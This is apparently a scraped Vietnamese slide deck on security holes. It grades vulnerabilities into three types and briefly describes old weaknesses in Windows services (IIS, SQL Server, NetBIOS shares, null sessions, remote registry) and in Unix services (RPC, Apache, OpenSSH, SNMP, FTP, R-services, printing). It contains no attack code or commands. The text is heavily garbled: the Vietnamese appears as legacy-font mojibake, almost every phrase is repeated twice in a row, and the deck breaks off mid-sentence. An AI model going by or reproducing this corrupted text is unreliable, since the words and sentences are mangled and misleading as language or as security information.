Upload
manlivo
View
253
Download
2
Embed Size (px)
Citation preview
Lç hæng b¶o mËtLç hæng b¶o mËt(Security Holes)(Security Holes)
PhÇn I: Mét sè vÊn ®Ò vÒ PhÇn I: Mét sè vÊn ®Ò vÒ lç hæng b¶o mËtlç hæng b¶o mËt
I.Kh i niÖm vÒ lç hæng b¶o mËtI.Kh i niÖm vÒ lç hæng b¶o mËt
Lç hæng b¶o mËt lµ nh÷ng ®iÓm yÕu trªn hÖ Lç hæng b¶o mËt lµ nh÷ng ®iÓm yÕu trªn hÖ
thèng hoÆc Èn chøa trong mét dÞch vô mµ dùa thèng hoÆc Èn chøa trong mét dÞch vô mµ dùa
vµo ®ã kÎ tÊn c«ng cã thÓ x©m nhËp tr i phÐp vµo ®ã kÎ tÊn c«ng cã thÓ x©m nhËp tr i phÐp
®Ó thùc hiÖn cc hµnh ®éng ph ho¹i hoÆc ®Ó thùc hiÖn cc hµnh ®éng ph ho¹i hoÆc
chiÕm ®o¹t tµi nguyªn bÊt hîp ph p.chiÕm ®o¹t tµi nguyªn bÊt hîp ph p.
II. Ph©n lo¹i læ hæng b¶o mËtII. Ph©n lo¹i læ hæng b¶o mËtLç hæng b¶o mËt ®îc ph©n lµm 3 lo¹i c¬ b¶n:Lç hæng b¶o mËt ®îc ph©n lµm 3 lo¹i c¬ b¶n:
- Lç hæng lo¹i A.- Lç hæng lo¹i A.
- Lç hæng lo¹i B.- Lç hæng lo¹i B.
- Lç hæng lo¹i C.- Lç hæng lo¹i C.
Lç hæng lo¹i C:Lç hæng lo¹i C: cc lç hæng lo¹i nµy cho phÐp cc thùc cc lç hæng lo¹i nµy cho phÐp cc thùc
hiÖn cc ph¬ng thøc tÊn c«ng DoS. Møc ®é nguy hiÖn cc ph¬ng thøc tÊn c«ng DoS. Møc ®é nguy
hiÓm thÊp, ChØ ¶nh hëng tíi chÊt lîng dÞch vô, cã hiÓm thÊp, ChØ ¶nh hëng tíi chÊt lîng dÞch vô, cã
thÓ lµm ngng trÖ gi¸n ®o¹n hÖ thèng, Kh«ng ph thÓ lµm ngng trÖ gi¸n ®o¹n hÖ thèng, Kh«ng ph
háng d÷ liÖu hoÆc ®¹t ®îc quyÒn truy cËp bÊt hîp háng d÷ liÖu hoÆc ®¹t ®îc quyÒn truy cËp bÊt hîp
ph p.ph p.
II. Ph©n lo¹i læ hæng b¶o mËtII. Ph©n lo¹i læ hæng b¶o mËt
- Lç hæng lo¹i B:Lç hæng lo¹i B: C c lç hæng lo¹i B cho phÐp ng C c lç hæng lo¹i B cho phÐp ng
êi sö dông cã thªm cc quyÒn trªn hÖ thèng mµ êi sö dông cã thªm cc quyÒn trªn hÖ thèng mµ
kh«ng cÇn kiÓm tra tÝnh hîp lÖ nªn cã thÓ dÉn kh«ng cÇn kiÓm tra tÝnh hîp lÖ nªn cã thÓ dÉn
®Õn mÊt mt hoÆc lé th«ng tin yªu cÇu b¶o mËt ®Õn mÊt mt hoÆc lé th«ng tin yªu cÇu b¶o mËt
hÖ thèng.hÖ thèng.
- Lç hæng lo¹i A:Lç hæng lo¹i A: C c lç hæng nµy cho phÐp ngêi C c lç hæng nµy cho phÐp ngêi
sö dông ë ngoµi cã thÓ truy nhËp vµo hÖ thèng sö dông ë ngoµi cã thÓ truy nhËp vµo hÖ thèng
bÊt hîp ph p. Lç hæng nµy rÊt nguy hiÓm cã bÊt hîp ph p. Lç hæng nµy rÊt nguy hiÓm cã
thÓ ph vë toµn bé hÖ thèng.thÓ ph vë toµn bé hÖ thèng.
III. Mét sè lç hæng thêng gÆp trong cc hÖ ®iÒu III. Mét sè lç hæng thêng gÆp trong cc hÖ ®iÒu hµnhhµnh
1. HÖ ®iÒu hµnh Microsoft Windows1. HÖ ®iÒu hµnh Microsoft WindowsLçi trªn cc dÞch vô th«ng tin Internet (IIS Ð Internet Information Lçi trªn cc dÞch vô th«ng tin Internet (IIS Ð Internet Information
Service): Service):
IIS rÊt dÔ x¶y ra t×nh tr¹ng mÊt an toµn ë 3 líp chÝnh nh sau:IIS rÊt dÔ x¶y ra t×nh tr¹ng mÊt an toµn ë 3 líp chÝnh nh sau:Ð Lçi xö lý cc yªu cÇu kh«ng ®îc dù kiÕn trícLçi xö lý cc yªu cÇu kh«ng ®îc dù kiÕn tríc (Fail to handle Unanticipated (Fail to handle Unanticipated
Requests):Requests): NhiÒu IIS rÊt dÔ bÞ tÊn c«ng do xö lý kh«ng ®óng cc yªu NhiÒu IIS rÊt dÔ bÞ tÊn c«ng do xö lý kh«ng ®óng cc yªu cÇu HTTP ®· ®îc ®Þnh d¹ng. Lîi dông ®iÓm yÕu nµy, kÎ tÊn c«ng tõ xa cÇu HTTP ®· ®îc ®Þnh d¹ng. Lîi dông ®iÓm yÕu nµy, kÎ tÊn c«ng tõ xa cã thÓ: Xem m· nguån cña cc kÞch b¶n øng dông, xem cc file bªn ngoµi cã thÓ: Xem m· nguån cña cc kÞch b¶n øng dông, xem cc file bªn ngoµi cña th môc web gèc, xem cc file web server ®· x©y dùng nhng kh«ng cña th môc web gèc, xem cc file web server ®· x©y dùng nhng kh«ng cung cÊp, thùc thi cc lÖnh tuú tiÖn trªn server.cung cÊp, thùc thi cc lÖnh tuú tiÖn trªn server.
Ð Lçi trµn bé ®Öm:Lçi trµn bé ®Öm: NhiÒu ISAPI më réng (ASP, PRINTER, SSHÉ ) rÊt dÔ NhiÒu ISAPI më réng (ASP, PRINTER, SSHÉ ) rÊt dÔ bÞ tÊn c«ng trµn vïng ®Öm. Nh÷ng tÊn c«ng trµn vïng ®Öm sÏ gióp cho kÎ bÞ tÊn c«ng trµn vïng ®Öm. Nh÷ng tÊn c«ng trµn vïng ®Öm sÏ gióp cho kÎ tÊn c«ng tõ xa ®¹t ®îc nh÷ng môc ®Ých sau: Tõ chèi dÞch vô (DoS), tÊn c«ng tõ xa ®¹t ®îc nh÷ng môc ®Ých sau: Tõ chèi dÞch vô (DoS), thùc thi cc m· hoÆc cc lÖnh bÊt kú trªn ng÷ c¶nh cña ngêi dïng cña thùc thi cc m· hoÆc cc lÖnh bÊt kú trªn ng÷ c¶nh cña ngêi dïng cña web server.web server.
Ð C c øng dông mÉu:C c øng dông mÉu: cc øng dông mÉu thêng ®îc thiÕt kÕ ®Ó gi¶i thÝch cc øng dông mÉu thêng ®îc thiÕt kÕ ®Ó gi¶i thÝch vai trß cña server nªn kh«ng cã kh¶ n ng chèng l¹i ®îc cc tÊn c«ng vµ vai trß cña server nªn kh«ng cã kh¶ n ng chèng l¹i ®îc cc tÊn c«ng vµ kh«ng cã dông ý phôc vô nh cc øng dông kh c. KÎ tÊn c«ng cã thÓ ghi kh«ng cã dông ý phôc vô nh cc øng dông kh c. KÎ tÊn c«ng cã thÓ ghi ®Ì cc file tuú ý trªn server, cã thÓ thu thËp cc th«ng tin vÒ c¬ së d÷ liÖu ®Ì cc file tuú ý trªn server, cã thÓ thu thËp cc th«ng tin vÒ c¬ së d÷ liÖu ngêi dïng.ngêi dïng.
C c thµnh phÇn truy nhËp d÷ liÖu Microsoft Ð C c dÞch C c thµnh phÇn truy nhËp d÷ liÖu Microsoft Ð C c dÞch vô d÷ liÖu tõ xa (Microsoft Data Access Components Ð vô d÷ liÖu tõ xa (Microsoft Data Access Components Ð Remote Data Services)Remote Data Services)
Ð Thµnh phÇn truy nhËp d÷ liÖu tõ xa (RDS) trong cc phiªn b¶n Thµnh phÇn truy nhËp d÷ liÖu tõ xa (RDS) trong cc phiªn b¶n
cò cña thµnh phÇn truy nhËp d÷ liÖu Microsoft (MDAC) cã mét cò cña thµnh phÇn truy nhËp d÷ liÖu Microsoft (MDAC) cã mét
ch¬ng tr×nh bÞ sai sãt cho phÐp ngêi dïng tõ xa cã thÓ thùc ch¬ng tr×nh bÞ sai sãt cho phÐp ngêi dïng tõ xa cã thÓ thùc
thi cc lÖnh côc bé víi ®Æc quyÒn cña ngêi qu¶n trÞ.thi cc lÖnh côc bé víi ®Æc quyÒn cña ngêi qu¶n trÞ.
Ð PhÇn lín cc hÖ ®iÒu hµnh Windows NT ch¹y IIS 3.0 hoÆc 4.0, PhÇn lín cc hÖ ®iÒu hµnh Windows NT ch¹y IIS 3.0 hoÆc 4.0,
Remote Data Service 1.5 vµ Visual Studio 6.0 ®Òu bÞ ¶nh hRemote Data Service 1.5 vµ Visual Studio 6.0 ®Òu bÞ ¶nh h
ëng bëi sai sãt nµyëng bëi sai sãt nµy
Microsoft SQL ServerMicrosoft SQL Server
Ð Microsoft SQL Server chøa mét sè ®iÓm yÕu nghiªm träng cho Microsoft SQL Server chøa mét sè ®iÓm yÕu nghiªm träng cho
phÐp kÎ tÊn c«ng tõ xa cã thÓ thu ®îc nh÷ng th«ng tin mËt, söa phÐp kÎ tÊn c«ng tõ xa cã thÓ thu ®îc nh÷ng th«ng tin mËt, söa
®æi néi dung c¬ së d÷ liÖu, lµm tæn th¬ng ®Õn SQL Server, ®æi néi dung c¬ së d÷ liÖu, lµm tæn th¬ng ®Õn SQL Server,
trong mét sè trêng hîp cã thÓ lµm tæn th¬ng ®Õn my chñ trong mét sè trêng hîp cã thÓ lµm tæn th¬ng ®Õn my chñ
Server.Server.
Ð BÊt kú hÖ thèng Windows nµo cµi ®Æt MS SQL Server 7.0 BÊt kú hÖ thèng Windows nµo cµi ®Æt MS SQL Server 7.0
hoÆc MS SQL Server 2000 hoÆc MS SQL Server Desktop hoÆc MS SQL Server 2000 hoÆc MS SQL Server Desktop
Engine 2000 ®Òu bÞ ¶nh hëng bëi ®iÓm yÕu nµy.Engine 2000 ®Òu bÞ ¶nh hëng bëi ®iÓm yÕu nµy.
NETBIOS Ð Unprotected Windows Networking sharesNETBIOS Ð Unprotected Windows Networking shares
Ð Microsoft Windows cung cÊp cho my chñ kh¶ n ng chia sÎ cc Microsoft Windows cung cÊp cho my chñ kh¶ n ng chia sÎ cc
file vµ th môc qua m¹ng víi c c my chñ kh c qua tiÖn Ých file vµ th môc qua m¹ng víi c c my chñ kh c qua tiÖn Ých
Windows Network Shares. MÆc dï ®©y lµ ®iÓm m¹nh vµ h÷u Windows Network Shares. MÆc dï ®©y lµ ®iÓm m¹nh vµ h÷u
Ých nhng nã l¹i ph« bµy cc file còng nh cung cÊp kü thuËt cho Ých nhng nã l¹i ph« bµy cc file còng nh cung cÊp kü thuËt cho
nh÷ng ngêi dïng bÊt chÝnh cã thÓ lÊy quyÒn ®iÒu khiÓn hoµn nh÷ng ngêi dïng bÊt chÝnh cã thÓ lÊy quyÒn ®iÒu khiÓn hoµn
toµn my chñ. Mét trong nh÷ng cch mµ virus Sircam vµ s©u toµn my chñ. Mét trong nh÷ng cch mµ virus Sircam vµ s©u
m¹ng Nimda l©y lan nhanh chãng vµo mïa hÌ 2001 lµ t×m ra m¹ng Nimda l©y lan nhanh chãng vµo mïa hÌ 2001 lµ t×m ra
nh÷ng tµi nguyªn m¹ng dïng chung kh«ng ®îc b¶o vÖ vµ ®a nh÷ng tµi nguyªn m¹ng dïng chung kh«ng ®îc b¶o vÖ vµ ®a
vµo ®ã mét b¶n sao cña chÝnh nã.vµo ®ã mét b¶n sao cña chÝnh nã.
Ð TÊt c¶ cc hÖ ®iÒu hµnh MS Windows ®Òu bÞ ¶nh hëng bëi TÊt c¶ cc hÖ ®iÒu hµnh MS Windows ®Òu bÞ ¶nh hëng bëi
®iÓm yÕu nµy.®iÓm yÕu nµy.
Anonymous Logon Ð Null SessionAnonymous Logon Ð Null Session
Ð KÕt nèi phiªn kh«ng hay ®¨ng nhËp nÆc danh lµ kü thuËt cho KÕt nèi phiªn kh«ng hay ®¨ng nhËp nÆc danh lµ kü thuËt cho
phÐp ngêi dïng nÆc danh lÊy cc th«ng tin qua m¹ng (tªn ngêi phÐp ngêi dïng nÆc danh lÊy cc th«ng tin qua m¹ng (tªn ngêi
dïng, cc tµi nguyªn dïng chung) hoÆc truy nhËp mµ kh«ng cÇn dïng, cc tµi nguyªn dïng chung) hoÆc truy nhËp mµ kh«ng cÇn
x c thùc. x c thùc.
Ð C c hÖ thèng Windows NT, XP vµ 2k ®Òu cã ®iÓm yÕu nµy.C c hÖ thèng Windows NT, XP vµ 2k ®Òu cã ®iÓm yÕu nµy.
X¸c thùc windows nãi chung Ð C c tµi kho¶n kh«ng mËt X¸c thùc windows nãi chung Ð C c tµi kho¶n kh«ng mËt khÈu hoÆc mËt khÈu yÕukhÈu hoÆc mËt khÈu yÕu
Ð MËt khÈu, cc m· an toµn thêng ®îc sö dông ®Ó t¬ng t c gi÷a MËt khÈu, cc m· an toµn thêng ®îc sö dông ®Ó t¬ng t c gi÷a
ngêi dïng vµ hÖ thèng th«ng tin. PhÇn lín viÖc x c thùc ngêi ngêi dïng vµ hÖ thèng th«ng tin. PhÇn lín viÖc x c thùc ngêi
dïng, b¶o vÖ file d÷ liÖu ®Òu yªu cÇu ngêi dïng cung cÊp mËt dïng, b¶o vÖ file d÷ liÖu ®Òu yªu cÇu ngêi dïng cung cÊp mËt
khÈu. V× nh÷ng truy nhËp x c thùc hîp lÖ kh«ng ®îc ghi l¹i, khÈu. V× nh÷ng truy nhËp x c thùc hîp lÖ kh«ng ®îc ghi l¹i,
thËm chÝ nÕu ®îc ghi l¹i còng kh«ng bao giê g©y nghi ngê, nªn thËm chÝ nÕu ®îc ghi l¹i còng kh«ng bao giê g©y nghi ngê, nªn
khi mËt khÈu bÞ lé sÏ lµ c¬ héi ®Ó ngêi kh c kh m ph hÖ khi mËt khÈu bÞ lé sÏ lµ c¬ héi ®Ó ngêi kh c kh m ph hÖ
thèng. Mét kÎ tÊn c«ng hoµn toµn cã thÓ truy nhËp ®Õn tµi thèng. Mét kÎ tÊn c«ng hoµn toµn cã thÓ truy nhËp ®Õn tµi
nguyªn cã s½n cña ngêi dïng nµo ®ã vµ cã thÓ trùc tiÕp cho nguyªn cã s½n cña ngêi dïng nµo ®ã vµ cã thÓ trùc tiÕp cho
phÐp cc kho¶n môc kh c cã thÓ truy nhËp ®Õn.phÐp cc kho¶n môc kh c cã thÓ truy nhËp ®Õn.
Ð BÊt cø hÖ thèng nµo mµ ngêi dïng ®îc x c thùc b»ng UserID BÊt cø hÖ thèng nµo mµ ngêi dïng ®îc x c thùc b»ng UserID
vµ Password ®Òu cã ®iÓm yÕu nµy.vµ Password ®Òu cã ®iÓm yÕu nµy.
Internet ExplorerInternet ExplorerÐ MS Internet Explorer lµ tr×nh duyÖt mÆc ®Þnh ®îc cµi ®Æt MS Internet Explorer lµ tr×nh duyÖt mÆc ®Þnh ®îc cµi ®Æt
trong cc hÖ ®iÒu hµnh MS Windows. TÊt c¶ cc phiªn b¶n hiÖn trong cc hÖ ®iÒu hµnh MS Windows. TÊt c¶ cc phiªn b¶n hiÖn
®ang tån t¹i ®Òu cã ®iÓm yÕu rÊt nguy hiÓm. §iÓm yÕu cã ®ang tån t¹i ®Òu cã ®iÓm yÕu rÊt nguy hiÓm. §iÓm yÕu cã
thÓ ®îc lîi dông ®Ó ph¬i bµy cc Cookie, c c file hoÆc d÷ liÖu thÓ ®îc lîi dông ®Ó ph¬i bµy cc Cookie, c c file hoÆc d÷ liÖu
riªng, thùc thi cc ch¬ng tr×nh riªng, t¶i xuèng hoÆc thùc thi cc riªng, thùc thi cc ch¬ng tr×nh riªng, t¶i xuèng hoÆc thùc thi cc
m· lÖnh bÊt kú hoÆc tiÕp qu¶n toµn bé hÖ thèng. m· lÖnh bÊt kú hoÆc tiÕp qu¶n toµn bé hÖ thèng.
Truy nhËp Registry tõ xa Ð (Remote Registry Truy nhËp Registry tõ xa Ð (Remote Registry
Access)Access)Ð Trong hÖ thèng Windows sö dông Registry, lµ mét c¬ së d÷ liÖu cã vÞ Trong hÖ thèng Windows sö dông Registry, lµ mét c¬ së d÷ liÖu cã vÞ
trÝ trung t©m ®Ó qu¶n lý phÇn mÒm, cÊu h×nh thiÕt bÞ vµ qu¶n lý ngtrÝ trung t©m ®Ó qu¶n lý phÇn mÒm, cÊu h×nh thiÕt bÞ vµ qu¶n lý ng
êi dïng. C c thiÕt lËp an toµn vµ cc quyÒn hîp lÖ cã thÓ cho phÐp truy êi dïng. C c thiÕt lËp an toµn vµ cc quyÒn hîp lÖ cã thÓ cho phÐp truy
nhËp vµ Registry tõ xa. KÎ tÊn c«ng cã thÓ lîi dông ®Æc ®iÓm nµy ®Ó nhËp vµ Registry tõ xa. KÎ tÊn c«ng cã thÓ lîi dông ®Æc ®iÓm nµy ®Ó
lµm tæn th¬ng hÖ thèng hoÆc thiÕt lËp cc cn cø ®Ó chØnh söa cc lµm tæn th¬ng hÖ thèng hoÆc thiÕt lËp cc cn cø ®Ó chØnh söa cc
quyÒn vµ cc liªn kÕt file cho phÐp cc m· c ý. quyÒn vµ cc liªn kÕt file cho phÐp cc m· c ý.
Ð TÊt c¶ cc phiªn b¶n cña MS Windows ®Òu cã ®iÓm yÕu nµy.TÊt c¶ cc phiªn b¶n cña MS Windows ®Òu cã ®iÓm yÕu nµy.
2. Trªn hÖ ®iÒu hµnh Unix2. Trªn hÖ ®iÒu hµnh Unix
C c lêi gäi thñ tôc tõ xa (Remote Procedure Calls - RPC)C c lêi gäi thñ tôc tõ xa (Remote Procedure Calls - RPC)
Ð Lêi gäi thñ tôc tõ xa cho phÐp mét ch¬ng tr×nh trªn mét my Lêi gäi thñ tôc tõ xa cho phÐp mét ch¬ng tr×nh trªn mét my
tÝnh thùc thi cc thñ tôc trªn mét my tÝnh kh c b»ng cch göi d÷ tÝnh thùc thi cc thñ tôc trªn mét my tÝnh kh c b»ng cch göi d÷
liÖu ®i vµ nhËn d÷ liÖu vÒ. V× thÕ RPC ®îc sö dông rÊt réng liÖu ®i vµ nhËn d÷ liÖu vÒ. V× thÕ RPC ®îc sö dông rÊt réng
r·i trong nhiÒu dÞch vô m¹ng nh qu¶n trÞ tõ xa, chia sÎ file É r·i trong nhiÒu dÞch vô m¹ng nh qu¶n trÞ tõ xa, chia sÎ file É
Tuy nhiªn, cã rÊt nhiÒu sai sãt trong RPC ®Ó kÎ tÊn c«ng cã Tuy nhiªn, cã rÊt nhiÒu sai sãt trong RPC ®Ó kÎ tÊn c«ng cã
thÓ lîi dông. Trong nhiÒu trêng hîp, RPC ®îc thùc hiÖn víi thÓ lîi dông. Trong nhiÒu trêng hîp, RPC ®îc thùc hiÖn víi
®Æc quyÒn lµ root (quyÒn qu¶n trÞ), kÕt qu¶ lµ hÖ thèng xuÊt ®Æc quyÒn lµ root (quyÒn qu¶n trÞ), kÕt qu¶ lµ hÖ thèng xuÊt
hiÖn cc dÞch vô RPC dÔ bÞ nguy hiÓm cã thÓ cung cÊp cho hiÖn cc dÞch vô RPC dÔ bÞ nguy hiÓm cã thÓ cung cÊp cho
kÎ tÊn c«ng víi quyÒn quy cËp root tõ xa kh«ng x c thùc. kÎ tÊn c«ng víi quyÒn quy cËp root tõ xa kh«ng x c thùc.
Ð TÊt c¶ cc hÖ thèng Unix vµ Linux cã cµi ®Æt dÞch vô RPC TÊt c¶ cc hÖ thèng Unix vµ Linux cã cµi ®Æt dÞch vô RPC
®Òu bÞ ¶nh hëng cña ®iÓm yÕu nµy.®Òu bÞ ¶nh hëng cña ®iÓm yÕu nµy.
Apache ServerApache ServerÐ §©y lµ Web Server mÆc ®Þnh trong cc hÖ thèng Unix vµ §©y lµ Web Server mÆc ®Þnh trong cc hÖ thèng Unix vµ
Linux. Nh÷ng ngêi qu¶n trÞ web cho r»ng Internet Information Linux. Nh÷ng ngêi qu¶n trÞ web cho r»ng Internet Information
Server thêng dÔ bÞ tæn th¬ng nªn Apache Server hoµn toµn Server thêng dÔ bÞ tæn th¬ng nªn Apache Server hoµn toµn
an toµn. Trong khi so s nh víi IIS, mÆc dï Apache xøng ®¸ng víi an toµn. Trong khi so s nh víi IIS, mÆc dï Apache xøng ®¸ng víi
danh tiÕng an toµn, nhng nã vÉn kh«ng chøng tá ®îc lµ kh«ng danh tiÕng an toµn, nhng nã vÉn kh«ng chøng tá ®îc lµ kh«ng
thÓ bÞ tÊn c«ng díi sù xem xÐt kü lìng. thÓ bÞ tÊn c«ng díi sù xem xÐt kü lìng.
Ð GÇn nh tÊt c¶ cc hÖ thèng Unix vµ Linux ®Òu cã thÓ bÞ ¶nh GÇn nh tÊt c¶ cc hÖ thèng Unix vµ Linux ®Òu cã thÓ bÞ ¶nh
hëng bëi nh÷ng yÕu ®iÓm cña Apache.hëng bëi nh÷ng yÕu ®iÓm cña Apache.
SSH (Secure Shell)SSH (Secure Shell)Ð Shell an toµn lµ dÞch vô phæ biÕn cho viÖc ®¨ng nhËp an toµn, Shell an toµn lµ dÞch vô phæ biÕn cho viÖc ®¨ng nhËp an toµn,
thùc thi cc lÖnh vµ truyÒn nhËn file qua m¹ng. PhÇn lín cc hÖ thùc thi cc lÖnh vµ truyÒn nhËn file qua m¹ng. PhÇn lín cc hÖ
®iÒu hµnh Unix ®Òu sö dông gãi phÇn mÒm m· nguån më ®iÒu hµnh Unix ®Òu sö dông gãi phÇn mÒm m· nguån më
OpenSSH. MÆc dï SSH an toµn h¬n nhiÒu so víi Telnet vµ Ftp OpenSSH. MÆc dï SSH an toµn h¬n nhiÒu so víi Telnet vµ Ftp
nhng nhiÒu sai sãt vÉn ®îc t×m thÊy trong khi thùc thi. PhÇn nhng nhiÒu sai sãt vÉn ®îc t×m thÊy trong khi thùc thi. PhÇn
lín lµ cc lçi nhá vÒ an toµn nhng ®· ®îc chØnh söa ngay lËp lín lµ cc lçi nhá vÒ an toµn nhng ®· ®îc chØnh söa ngay lËp
tùc. §iÒu nguy hiÓm nhÊt trong viÖc lîi dông cc lç hæng nµy lµ tùc. §iÒu nguy hiÓm nhÊt trong viÖc lîi dông cc lç hæng nµy lµ
nã cho phÐp mét kÎ tÊn c«ng cã thÓ cã ®îc quyÒn truy nhËp nã cho phÐp mét kÎ tÊn c«ng cã thÓ cã ®îc quyÒn truy nhËp
root trªn mét my tõ xa.root trªn mét my tõ xa.
Ð TÊt c¶ cc hÖ ®iÒu hµnh Unix hoÆc Linux cµi ®Æt cc phiªn TÊt c¶ cc hÖ ®iÒu hµnh Unix hoÆc Linux cµi ®Æt cc phiªn
b¶n OpenSHH 3.3 hoÆc cò h¬n ®Òu chÞu ¶nh hëng cña b¶n OpenSHH 3.3 hoÆc cò h¬n ®Òu chÞu ¶nh hëng cña
®iÓm yÕu nµy.®iÓm yÕu nµy.
Giao thøc qu¶n lý m¹ng ®¬n gi¶n (Giao thøc qu¶n lý m¹ng ®¬n gi¶n (Simple Simple
Network Management Protocol -SNMP)Network Management Protocol -SNMP)Ð Giao thøc nµy ®îc sö dông réng r·i ®Ó gi¸m s t tõ xa vµ cÊu Giao thøc nµy ®îc sö dông réng r·i ®Ó gi¸m s t tõ xa vµ cÊu
h×nh hÇu nh tÊt c¶ cc thiÕt bÞ hiÖn ®¹i cho phÐp giao thøc h×nh hÇu nh tÊt c¶ cc thiÕt bÞ hiÖn ®¹i cho phÐp giao thøc
TCP/IP. SNMP thêng ®îc sö dông lµ ph¬ng ph p ®Ó cÊu TCP/IP. SNMP thêng ®îc sö dông lµ ph¬ng ph p ®Ó cÊu
h×nh vµ qu¶n lý cc thiÕt bÞ nh my in, router, chuyÓn m¹ch, h×nh vµ qu¶n lý cc thiÕt bÞ nh my in, router, chuyÓn m¹ch,
É , vµ cung cÊp d÷ liÖu vµo cho cc dÞch vô gi¸m s t m¹ng. É , vµ cung cÊp d÷ liÖu vµo cho cc dÞch vô gi¸m s t m¹ng.
Ð Sù truyÒn th«ng SNMP bao gåm viÖc trao ®æi cc lo¹i th«ng Sù truyÒn th«ng SNMP bao gåm viÖc trao ®æi cc lo¹i th«ng
bo kh c nhau gi÷a cc tr¹m qu¶n lý SNMP vµ cc vµ nh÷ng thiÕt b o kh c nhau gi÷a cc tr¹m qu¶n lý SNMP vµ cc vµ nh÷ng thiÕt
bÞ m¹ng. C ch thøc sö dông cc th«ng bo nµy vµ kü thuËt x c bÞ m¹ng. C ch thøc sö dông cc th«ng bo nµy vµ kü thuËt x c
thùc trªn cc th«ng bo nµy ®Òu cã ®iÓm yÕu ®Ó cã thÓ khai thùc trªn cc th«ng bo nµy ®Òu cã ®iÓm yÕu ®Ó cã thÓ khai
th c mét cch ®¸ng kÓ ®Ó kÎ tÊn c«ng cã thÓ lîi dông ®Ó cÊu th c mét cch ®¸ng kÓ ®Ó kÎ tÊn c«ng cã thÓ lîi dông ®Ó cÊu
h×nh l¹i hoÆc t¾t cc thiÕt bÞ tõ xa. ViÖc truyÒn th«ng SNMP h×nh l¹i hoÆc t¾t cc thiÕt bÞ tõ xa. ViÖc truyÒn th«ng SNMP
®îc coi lµ sù béc lé sè lîng lín cc cÊu tróc m¹ng còng nh cc ®îc coi lµ sù béc lé sè lîng lín cc cÊu tróc m¹ng còng nh cc
thiÕt bÞ vµ hÖ thèng g¾n vµo nã. KÎ x©m nhËp sö dông cc thiÕt bÞ vµ hÖ thèng g¾n vµo nã. KÎ x©m nhËp sö dông cc
th«ng tin nµy ®Ó lùa chän môc ®Ých vµ lËp kÕ ho¹ch tÊn c«ng.th«ng tin nµy ®Ó lùa chän môc ®Ých vµ lËp kÕ ho¹ch tÊn c«ng.
DÞch vô truyÒn file DÞch vô truyÒn file (File Transfer Protocol (File Transfer Protocol
-FTP)-FTP) Ð FTP lµ dÞch vô dïng ®Ó ph©n phèi cc file cho cc ngêi dïng FTP lµ dÞch vô dïng ®Ó ph©n phèi cc file cho cc ngêi dïng
nÆc danh hoÆc ®îc x c thùc (b»ng username vµ password). nÆc danh hoÆc ®îc x c thùc (b»ng username vµ password).
Ngêi dïng nÆc danh kh«ng cÇn cung cÊp mËt khÈu truy nhËp Ngêi dïng nÆc danh kh«ng cÇn cung cÊp mËt khÈu truy nhËp
cho nªn tÊt c¶ cc ngêi dïng ®Òu cã thÓ sö dông cïng mét tªn cho nªn tÊt c¶ cc ngêi dïng ®Òu cã thÓ sö dông cïng mét tªn
®Ó ®¨ng nhËp (anonymous hoÆc ftp). C c dÞch vô Ftp yªu cÇu ®Ó ®¨ng nhËp (anonymous hoÆc ftp). C c dÞch vô Ftp yªu cÇu
x c thùc cÇnph¶i cung cÊp username vµ password nhng nã l¹i x c thùc cÇnph¶i cung cÊp username vµ password nhng nã l¹i
truyÒn ®i díi d¹ng râ nªn rÊt dÔ bÞ lé trªn ®êng truyÒn. NhiÒu truyÒn ®i díi d¹ng râ nªn rÊt dÔ bÞ lé trªn ®êng truyÒn. NhiÒu
sai sãt nguy hiÓm ®· ®îc t×m ra trong dÞch vô nµy gióp cho kÎ sai sãt nguy hiÓm ®· ®îc t×m ra trong dÞch vô nµy gióp cho kÎ
tÊn c«ng cã thÓ giµnh ®îc quyÒn truy nhËp root ®Ó truy nhËp tÊn c«ng cã thÓ giµnh ®îc quyÒn truy nhËp root ®Ó truy nhËp
vµ khai t c my chñ Ftp Server.vµ khai t c my chñ Ftp Server.
DÞch vô R- Quan hÖ tin tëng (R-services Ð Trust DÞch vô R- Quan hÖ tin tëng (R-services Ð Trust
Relationships)Relationships) Ð Shell tõ xa (rsh), copy tõ xa (rcp), login tõ xa (rlogin) vµ thùc thi Shell tõ xa (rsh), copy tõ xa (rcp), login tõ xa (rlogin) vµ thùc thi
tõ xa (rexec) lµ cc lÖnh R (R-commands) ®îc sö dông rÊt réng tõ xa (rexec) lµ cc lÖnh R (R-commands) ®îc sö dông rÊt réng
r·i trong thÕ giíi Unix. C c tæ chøc sö dông nhiÒu my chñ Unix r·i trong thÕ giíi Unix. C c tæ chøc sö dông nhiÒu my chñ Unix
®Òu sö dông dÞch vô R ®Ó cho phÐp cc user cã thÓ chuyÓn ®Òu sö dông dÞch vô R ®Ó cho phÐp cc user cã thÓ chuyÓn
tõ my nµy sang my kh c mµ kh«ng cÇn ph¶i nhËp l¹i username tõ my nµy sang my kh c mµ kh«ng cÇn ph¶i nhËp l¹i username
vµ password mét lÇn n÷a. Khi quan hÖ tin cËy kh«ng ®îc thiÕt vµ password mét lÇn n÷a. Khi quan hÖ tin cËy kh«ng ®îc thiÕt
lËp th× ngêi dïng muèn ®¨ng nhËp ®Õn my kh c b¾t buéc lËp th× ngêi dïng muèn ®¨ng nhËp ®Õn my kh c b¾t buéc
ph¶i göi username vµ password qua m¹ng do ®ã rÊt dÔ bÞ ph¶i göi username vµ password qua m¹ng do ®ã rÊt dÔ bÞ
®¸nh c¾p v× chóng ®îc truyÒn ®i díi d¹ng râ. Khi quan hÖ tin ®¸nh c¾p v× chóng ®îc truyÒn ®i díi d¹ng râ. Khi quan hÖ tin
cËy ®îc thiÕt lËp th× kÎ tÊn c«ng cã thÓ gi¶ danh mét ngêi cËy ®îc thiÕt lËp th× kÎ tÊn c«ng cã thÓ gi¶ danh mét ngêi
dïng hîp lÖ trªn mét my chñ hîp lÖ ®Ó truy nhËp vµ khai th c tµi dïng hîp lÖ trªn mét my chñ hîp lÖ ®Ó truy nhËp vµ khai th c tµi
nguyªn trªn tÊt c¶ cc my kh c. nguyªn trªn tÊt c¶ cc my kh c.
DÞch vô in Ên (Line Printer Daemon)DÞch vô in Ên (Line Printer Daemon)
Ð LPD lµ dÞch vô cho phÐp ngêi dïng kÕt nèi ®Õn mét my in LPD lµ dÞch vô cho phÐp ngêi dïng kÕt nèi ®Õn mét my in
côc bé tõ mét my tÝnh côc bé hoÆc ë xa theo giao thøc TCP côc bé tõ mét my tÝnh côc bé hoÆc ë xa theo giao thøc TCP
cæng 515. LPD lµ cch phæ biÕn nhÊt ®Ó sö dông dÞch vô in cæng 515. LPD lµ cch phæ biÕn nhÊt ®Ó sö dông dÞch vô in
